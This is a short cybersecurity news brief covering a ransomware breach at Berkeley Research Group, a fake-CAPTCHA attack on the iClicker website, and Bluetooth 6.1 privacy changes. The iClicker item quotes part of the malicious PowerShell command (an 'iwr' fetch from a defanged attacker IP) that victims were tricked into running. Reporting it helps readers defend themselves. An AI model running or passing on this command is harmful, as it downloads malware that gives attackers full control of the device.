Svoboda Cybersecurity Brief May 12, 2025

May 12, 2025

bulletproof VPN - stay anonymous

Data breach exposes Catholic clergy abuse survivors’ information

The Berkeley Research Group (BRG) suffered a ransomware attack on March 2, 2025, potentially exposing sensitive data of diocesan sex abuse survivors involved in bankruptcy lawsuits. Attackers gained access via Microsoft Teams phishing, deployed Chaos ransomware, and were paid an undisclosed ransom despite providing a “destruction log.” The Department of Justice criticized BRG’s delayed notification to affected parties, with some clients only informed on April 28.
Source: DataBreaches

iClicker website compromised to distribute malware via fake CAPTCHA

Between April 12-16, 2025, the iClicker student engagement platform’s website was hacked to display a fake CAPTCHA prompting users to execute a PowerShell script (iwr http://67.217.228[.]14:8080). The script delivered malware granting attackers full device access, though some users received a legitimate Microsoft Visual C++ Redistributable as a decoy. iClicker downplayed the incident and obscured its security bulletin with a noindex tag.
Impact: Compromised devices risk credential theft, ransomware, and further network breaches.
Mitigation: Affected users should run security scans, change all passwords, and use a password manager.
Source: BleepingComputer

Bluetooth 6.1 introduces randomized RPA timing to enhance privacy

Bluetooth SIG’s Core Specification 6.1 adds randomized Resolvable Private Address (RPA) updates (8-15 mins by default) to mitigate correlation attacks. The update also improves power efficiency by allowing controllers to handle RPA generation autonomously. Hardware adoption is expected by 2026, with full feature rollout likely delayed.
Source: BleepingComputer

Share this brief: https://svo.bz/Ias7

If you want to support us, you can donate here: Donate